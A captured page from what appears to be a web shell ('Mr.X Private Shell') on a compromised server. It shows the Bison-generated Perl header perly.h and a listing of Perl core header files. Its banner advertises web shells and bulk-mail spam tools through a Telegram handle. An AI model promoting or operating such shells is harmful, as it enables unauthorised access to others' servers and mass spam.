__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/* -*- mode: C; buffer-read-only: t -*-
   !!!!!!!   DO NOT EDIT THIS FILE   !!!!!!!
   This file is built by regen_perly.pl from perly.y.
   Any changes made here will be lost!
 */

#define PERL_BISON_VERSION  30007

#ifdef PERL_CORE
/* A Bison parser, made by GNU Bison 3.7.  */

/* Bison interface for Yacc-like parsers in C

   Copyright (C) 1984, 1989-1990, 2000-2015, 2018-2020 Free Software Foundation,
   Inc.

   This program is free software: you can redistribute it and/or modify
   it under the terms of the GNU General Public License as published by
   the Free Software Foundation, either version 3 of the License, or
   (at your option) any later version.

   This program is distributed in the hope that it will be useful,
   but WITHOUT ANY WARRANTY; without even the implied warranty of
   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
   GNU General Public License for more details.

   You should have received a copy of the GNU General Public License
   along with this program.  If not, see <http://www.gnu.org/licenses/>.  */

/* As a special exception, you may create a larger work that contains
   part or all of the Bison parser skeleton and distribute that work
   under terms of your choice, so long as that work isn't itself a
   parser generator using the skeleton or a modified version thereof
   as a parser skeleton.  Alternatively, if you modify or redistribute
   the parser skeleton itself, you may (at your option) remove this
   special exception, which will cause the skeleton and the resulting
   Bison output files to be licensed under the GNU General Public
   License without this special exception.

   This special exception was added by the Free Software Foundation in
   version 2.2 of Bison.  */

/* DO NOT RELY ON FEATURES THAT ARE NOT DOCUMENTED in the manual,
   especially those whose name start with YY_ or yy_.  They are
   private implementation details that can be changed or removed.  */

/* Debug traces.  */
#ifndef YYDEBUG
# define YYDEBUG 0
#endif
#if YYDEBUG
extern int yydebug;
#endif

/* Token kinds.  */
#ifndef YYTOKENTYPE
# define YYTOKENTYPE
  enum yytokentype
  {
    YYEMPTY = -2,
    YYEOF = 0,                     /* "end of file"  */
    YYerror = 256,                 /* error  */
    YYUNDEF = 257,                 /* "invalid token"  */
    GRAMPROG = 258,                /* GRAMPROG  */
    GRAMEXPR = 259,                /* GRAMEXPR  */
    GRAMBLOCK = 260,               /* GRAMBLOCK  */
    GRAMBARESTMT = 261,            /* GRAMBARESTMT  */
    GRAMFULLSTMT = 262,            /* GRAMFULLSTMT  */
    GRAMSTMTSEQ = 263,             /* GRAMSTMTSEQ  */
    GRAMSUBSIGNATURE = 264,        /* GRAMSUBSIGNATURE  */
    PERLY_AMPERSAND = 265,         /* PERLY_AMPERSAND  */
    PERLY_BRACE_OPEN = 266,        /* PERLY_BRACE_OPEN  */
    PERLY_BRACE_CLOSE = 267,       /* PERLY_BRACE_CLOSE  */
    PERLY_BRACKET_OPEN = 268,      /* PERLY_BRACKET_OPEN  */
    PERLY_BRACKET_CLOSE = 269,     /* PERLY_BRACKET_CLOSE  */
    PERLY_COMMA = 270,             /* PERLY_COMMA  */
    PERLY_DOLLAR = 271,            /* PERLY_DOLLAR  */
    PERLY_DOT = 272,               /* PERLY_DOT  */
    PERLY_EQUAL_SIGN = 273,        /* PERLY_EQUAL_SIGN  */
    PERLY_MINUS = 274,             /* PERLY_MINUS  */
    PERLY_PERCENT_SIGN = 275,      /* PERLY_PERCENT_SIGN  */
    PERLY_PLUS = 276,              /* PERLY_PLUS  */
    PERLY_SEMICOLON = 277,         /* PERLY_SEMICOLON  */
    PERLY_SLASH = 278,             /* PERLY_SLASH  */
    PERLY_SNAIL = 279,             /* PERLY_SNAIL  */
    PERLY_STAR = 280,              /* PERLY_STAR  */
    KW_FORMAT = 281,               /* KW_FORMAT  */
    KW_PACKAGE = 282,              /* KW_PACKAGE  */
    KW_CLASS = 283,                /* KW_CLASS  */
    KW_LOCAL = 284,                /* KW_LOCAL  */
    KW_MY = 285,                   /* KW_MY  */
    KW_FIELD = 286,                /* KW_FIELD  */
    KW_IF = 287,                   /* KW_IF  */
    KW_ELSE = 288,                 /* KW_ELSE  */
    KW_ELSIF = 289,                /* KW_ELSIF  */
    KW_UNLESS = 290,               /* KW_UNLESS  */
    KW_FOR = 291,                  /* KW_FOR  */
    KW_UNTIL = 292,                /* KW_UNTIL  */
    KW_WHILE = 293,                /* KW_WHILE  */
    KW_CONTINUE = 294,             /* KW_CONTINUE  */
    KW_GIVEN = 295,                /* KW_GIVEN  */
    KW_WHEN = 296,                 /* KW_WHEN  */
    KW_DEFAULT = 297,              /* KW_DEFAULT  */
    KW_TRY = 298,                  /* KW_TRY  */
    KW_CATCH = 299,                /* KW_CATCH  */
    KW_FINALLY = 300,              /* KW_FINALLY  */
    KW_DEFER = 301,                /* KW_DEFER  */
    KW_REQUIRE = 302,              /* KW_REQUIRE  */
    KW_DO = 303,                   /* KW_DO  */
    KW_USE_or_NO = 304,            /* KW_USE_or_NO  */
    KW_SUB_named = 305,            /* KW_SUB_named  */
    KW_SUB_named_sig = 306,        /* KW_SUB_named_sig  */
    KW_SUB_anon = 307,             /* KW_SUB_anon  */
    KW_SUB_anon_sig = 308,         /* KW_SUB_anon_sig  */
    KW_METHOD_named = 309,         /* KW_METHOD_named  */
    KW_METHOD_anon = 310,          /* KW_METHOD_anon  */
    BAREWORD = 311,                /* BAREWORD  */
    METHCALL0 = 312,               /* METHCALL0  */
    METHCALL = 313,                /* METHCALL  */
    THING = 314,                   /* THING  */
    PMFUNC = 315,                  /* PMFUNC  */
    PRIVATEREF = 316,              /* PRIVATEREF  */
    QWLIST = 317,                  /* QWLIST  */
    FUNC0OP = 318,                 /* FUNC0OP  */
    FUNC0SUB = 319,                /* FUNC0SUB  */
    UNIOPSUB = 320,                /* UNIOPSUB  */
    LSTOPSUB = 321,                /* LSTOPSUB  */
    PLUGEXPR = 322,                /* PLUGEXPR  */
    PLUGSTMT = 323,                /* PLUGSTMT  */
    LABEL = 324,                   /* LABEL  */
    LOOPEX = 325,                  /* LOOPEX  */
    DOTDOT = 326,                  /* DOTDOT  */
    YADAYADA = 327,                /* YADAYADA  */
    FUNC0 = 328,                   /* FUNC0  */
    FUNC1 = 329,                   /* FUNC1  */
    FUNC = 330,                    /* FUNC  */
    UNIOP = 331,                   /* UNIOP  */
    LSTOP = 332,                   /* LSTOP  */
    POWOP = 333,                   /* POWOP  */
    MULOP = 334,                   /* MULOP  */
    ADDOP = 335,                   /* ADDOP  */
    DOLSHARP = 336,                /* DOLSHARP  */
    HASHBRACK = 337,               /* HASHBRACK  */
    NOAMP = 338,                   /* NOAMP  */
    COLONATTR = 339,               /* COLONATTR  */
    FORMLBRACK = 340,              /* FORMLBRACK  */
    FORMRBRACK = 341,              /* FORMRBRACK  */
    SUBLEXSTART = 342,             /* SUBLEXSTART  */
    SUBLEXEND = 343,               /* SUBLEXEND  */
    PHASER = 344,                  /* PHASER  */
    PREC_LOW = 345,                /* PREC_LOW  */
    PLUGIN_LOW_OP = 346,           /* PLUGIN_LOW_OP  */
    OROP = 347,                    /* OROP  */
    PLUGIN_LOGICAL_OR_LOW_OP = 348, /* PLUGIN_LOGICAL_OR_LOW_OP  */
    ANDOP = 349,                   /* ANDOP  */
    PLUGIN_LOGICAL_AND_LOW_OP = 350, /* PLUGIN_LOGICAL_AND_LOW_OP  */
    NOTOP = 351,                   /* NOTOP  */
    ASSIGNOP = 352,                /* ASSIGNOP  */
    PLUGIN_ASSIGN_OP = 353,        /* PLUGIN_ASSIGN_OP  */
    PERLY_QUESTION_MARK = 354,     /* PERLY_QUESTION_MARK  */
    PERLY_COLON = 355,             /* PERLY_COLON  */
    OROR = 356,                    /* OROR  */
    DORDOR = 357,                  /* DORDOR  */
    PLUGIN_LOGICAL_OR_OP = 358,    /* PLUGIN_LOGICAL_OR_OP  */
    ANDAND = 359,                  /* ANDAND  */
    PLUGIN_LOGICAL_AND_OP = 360,   /* PLUGIN_LOGICAL_AND_OP  */
    BITOROP = 361,                 /* BITOROP  */
    BITANDOP = 362,                /* BITANDOP  */
    CHEQOP = 363,                  /* CHEQOP  */
    NCEQOP = 364,                  /* NCEQOP  */
    CHRELOP = 365,                 /* CHRELOP  */
    NCRELOP = 366,                 /* NCRELOP  */
    PLUGIN_REL_OP = 367,           /* PLUGIN_REL_OP  */
    SHIFTOP = 368,                 /* SHIFTOP  */
    PLUGIN_ADD_OP = 369,           /* PLUGIN_ADD_OP  */
    PLUGIN_MUL_OP = 370,           /* PLUGIN_MUL_OP  */
    MATCHOP = 371,                 /* MATCHOP  */
    PERLY_EXCLAMATION_MARK = 372,  /* PERLY_EXCLAMATION_MARK  */
    PERLY_TILDE = 373,             /* PERLY_TILDE  */
    UMINUS = 374,                  /* UMINUS  */
    REFGEN = 375,                  /* REFGEN  */
    PLUGIN_POW_OP = 376,           /* PLUGIN_POW_OP  */
    PREINC = 377,                  /* PREINC  */
    PREDEC = 378,                  /* PREDEC  */
    POSTINC = 379,                 /* POSTINC  */
    POSTDEC = 380,                 /* POSTDEC  */
    POSTJOIN = 381,                /* POSTJOIN  */
    PLUGIN_HIGH_OP = 382,          /* PLUGIN_HIGH_OP  */
    ARROW = 383,                   /* ARROW  */
    PERLY_PAREN_CLOSE = 384,       /* PERLY_PAREN_CLOSE  */
    PERLY_PAREN_OPEN = 385         /* PERLY_PAREN_OPEN  */
  };
  typedef enum yytokentype yytoken_kind_t;
#endif

/* Value type.  */
#ifdef PERL_IN_TOKE_C
static bool
S_is_opval_token(int type) {
    switch (type) {
    case BAREWORD:
    case FUNC0OP:
    case FUNC0SUB:
    case LABEL:
    case LSTOPSUB:
    case METHCALL:
    case METHCALL0:
    case PLUGEXPR:
    case PLUGSTMT:
    case PMFUNC:
    case PRIVATEREF:
    case QWLIST:
    case THING:
    case UNIOPSUB:
	return 1;
    }
    return 0;
}
#endif /* PERL_IN_TOKE_C */
#endif /* PERL_CORE */
#if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED
union YYSTYPE
{

    I32	ival; /* __DEFAULT__ (marker for regen_perly.pl;
				must always be 1st union member) */
    void *pval;
    OP *opval;
    GV *gvval;


};
typedef union YYSTYPE YYSTYPE;
# define YYSTYPE_IS_TRIVIAL 1
# define YYSTYPE_IS_DECLARED 1
#endif



int yyparse (void);


/* Generated from:
 * 823630846fc59cc2a19502726ec723b568eabded55fdc5e9722c600e1098779e perly.y
 * acf1cbfd2545faeaaa58b1cf0cf9d7f98b5be0752eb7a54528ef904a9e2e1ca7 regen_perly.pl
 * ex: set ro ft=c: */

Filemanager

Name Type Size Permission Actions
EXTERN.h File 1.55 KB 0644
INTERN.h File 1.26 KB 0644
XSUB.h File 23.73 KB 0644
av.h File 7.08 KB 0644
bitcount.h File 1.01 KB 0644
charclass_invlists.h File 4.32 MB 0644
config.h File 165.81 KB 0644
cop.h File 56.42 KB 0644
cv.h File 14.42 KB 0644
dosish.h File 3.6 KB 0644
ebcdic_tables.h File 48.75 KB 0644
embed.h File 148.46 KB 0644
embedvar.h File 23.79 KB 0644
fakesdio.h File 3.13 KB 0644
feature.h File 18.51 KB 0644
form.h File 1.43 KB 0644
git_version.h File 357 B 0644
gv.h File 12.34 KB 0644
handy.h File 143.45 KB 0644
hv.h File 27.62 KB 0644
hv_func.h File 7.72 KB 0644
hv_macro.h File 3.1 KB 0644
inline.h File 133.63 KB 0644
intrpvar.h File 38.22 KB 0644
invlist_inline.h File 11.22 KB 0644
iperlsys.h File 62.5 KB 0644
keywords.h File 6.68 KB 0644
l1_char_class_tab.h File 118.13 KB 0644
locale_table.h File 6.04 KB 0644
malloc_ctl.h File 1.49 KB 0644
metaconfig.h File 2.48 KB 0644
mg.h File 3.56 KB 0644
mg_data.h File 5.54 KB 0644
mg_raw.h File 4.71 KB 0644
mg_vtable.h File 10.23 KB 0644
mydtrace.h File 1.65 KB 0644
nostdio.h File 3.53 KB 0644
op.h File 40.88 KB 0644
op_reg_common.h File 5.9 KB 0644
opcode.h File 96.81 KB 0644
opnames.h File 9.21 KB 0644
overload.h File 3.21 KB 0644
pad.h File 19.62 KB 0644
parser.h File 6.95 KB 0644
patchlevel-debian.h File 5.5 KB 0644
patchlevel.h File 6.33 KB 0644
perl.h File 326.07 KB 0644
perl_inc_macro.h File 5.88 KB 0644
perl_langinfo.h File 7.88 KB 0644
perl_siphash.h File 5.06 KB 0644
perlapi.h File 635 B 0644
perlio.h File 9.48 KB 0644
perliol.h File 13.27 KB 0644
perlsdio.h File 527 B 0644
perlstatic.h File 894 B 0644
perlvars.h File 16.72 KB 0644
perly.h File 9.89 KB 0644
pp.h File 29.79 KB 0644
pp_proto.h File 20.46 KB 0644
proto.h File 337.94 KB 0644
reentr.h File 85.34 KB 0644
regcharclass.h File 270.27 KB 0644
regcomp.h File 68.54 KB 0644
regcomp_internal.h File 60.55 KB 0644
regexp.h File 45.69 KB 0644
reginline.h File 1.54 KB 0644
regnodes.h File 126.98 KB 0644
sbox32_hash.h File 54.43 KB 0644
scope.h File 12.19 KB 0644
scope_types.h File 5.1 KB 0644
sv.h File 106.01 KB 0644
sv_inline.h File 28.33 KB 0644
thread.h File 19.53 KB 0644
time64.h File 900 B 0644
time64_config.h File 2.02 KB 0644
uni_keywords.h File 557.44 KB 0644
unicode_constants.h File 57.28 KB 0644
unixish.h File 5.44 KB 0644
utf8.h File 59.93 KB 0644
utfebcdic.h File 11.48 KB 0644
util.h File 10.47 KB 0644
uudmap.h File 1.03 KB 0644
vutil.h File 3.96 KB 0644
warnings.h File 11.86 KB 0644
zaphod32_hash.h File 9.47 KB 0644
Filemanager